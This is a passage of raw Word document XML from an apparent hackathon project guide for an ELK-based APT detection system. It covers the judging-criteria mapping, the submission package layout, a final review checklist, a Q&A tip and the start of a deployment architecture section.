              <w:t>Dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54EE47AA" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Graphs auto-refresh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="74C444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FE057" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2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25E3FDA" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Kibana password enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="18F65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CD0A2" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs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575CAA19" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>auto_backup.sh runs weekly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="7D6DBD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88E78" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2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0AE6537" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>&lt; 2 sec latency for 5 k logs / sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76148519" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="5EAE3653">
          <v:rect id="_x0000_i1154" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C430C18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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 10.5 — Evaluation Criteria Mapping (SIH Judging)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4863"/>
      </w:tblGrid>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="05F573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39983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SIH Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D94F12E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How You Address It</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="17D526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F43D7" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs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14:paraId="45BA517E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Custom APT detection rules (MITRE ATT&amp;CK-mapped)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="3A5607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2251A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Relevance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23F648DD" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Detects real national-level cyber threats</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="0D730A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50755" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs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51A6F788" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Built on open-source ELK Stack + Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="479E39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FFDE7" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2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2A9C420A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>End-to-end pipeline + demo alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="60946D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42806" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2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6803C41" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Supports multi-node Elastic Cluster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="568508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4D8F7" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2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1445BDE" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Early APT detection → national cyber resilience</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48B14552" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="5C66FDB8">
          <v:rect id="_x0000_i1155" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BD487C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lastRenderedPageBreak/>
        <w:t>📦</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 10.6 — Submission Package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9293E4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>Bundle all into a .zip file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5540594F" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>ELK-APTGuard_Submission.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AF107B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2"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docs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7717FDEC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SIH_Presentation.pptx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E752C42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Technical_Report.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202FE4FA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architecture.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68700E2E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>│   └── demo_video.mp4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDCDFDE" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2"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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>source_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D85035F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docker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>compose.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42DEFE12" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">│   </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>beats_configs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC5D8F8" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">│   └── </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64219987" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>└── README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780BBE8F" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="76206770">
          <v:rect id="_x0000_i1156" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A7114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🏁</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 10.7 — Final Review Checklist </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>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642"/>
      </w:tblGrid>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="326BD3B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0F34B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76B254CA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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="50327A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55FDA" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Architecture diagram included</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C5B28A0" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✔️</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="5CAE7C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F2F32" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Working Docker deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64E267A1" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✔️</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="649535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8B095" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve">At least 3 rules detecting APT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004536D2">
              <w:t>behaviors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B017E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✔️</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="7746DD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1FE24" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Dashboard visualizations ready</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DBF8465" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✔️</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="04AA3B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D8326" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Video demo recorded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="255D3AEC" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✔️</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="204ADE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475E0" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Report &amp; PPT formatted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38EABC69" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✔️</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="62B08B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B8D0" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Team prepared for Q&amp;A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0873EF50" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✔️</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29DE095B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="542D2D98">
          <v:rect id="_x0000_i1157" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4619BADB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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 10.8 — Pro Tip for Q&amp;A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64223262" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Judge:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> “How does your system differ from a normal ELK setup?”</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>You:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> “We customized ELK with </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>APT-specific detection rules</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>threat-intel enrichment</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> — transforming it from a generic log tool into an actionable APT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> framework.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F0C2A2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☁️</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 11 — Final Deployment Architecture (Hybrid: Local + Cloud)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7967960B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="3781993D">
          <v:rect id="_x0000_i1158" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F411FE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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6309A0" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>To design and deploy your project in a way that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25751C7D" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Works </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>locally</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> (for development &amp; demo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2A754" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Scales </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>on the cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> (for real-world deployment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6469F2AB" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>centralized threat detection</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> for multiple endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F69F4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="01E09C4B">
          <v:rect id="_x0000_i1159" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE09BB1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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Architecture Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C1BE48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💡</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD6FA0" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Your </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>APT Detection System</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> built on </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ELK Stack</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> runs as a </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>centralized threat-monitoring hub</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
        <w:t xml:space="preserve">Logs come from multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sources (servers, endpoints, and sensors)</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> → are collected and normalized by </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logstash</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> → stored and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>analyzed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> → visualized and alerted via </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kibana</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A0320E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="20D8A8A3">
          <v:rect id="_x0000_i1160" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AD2744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🏗️</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Components and Flow</w:t>
      </w:r>
    </w:p>
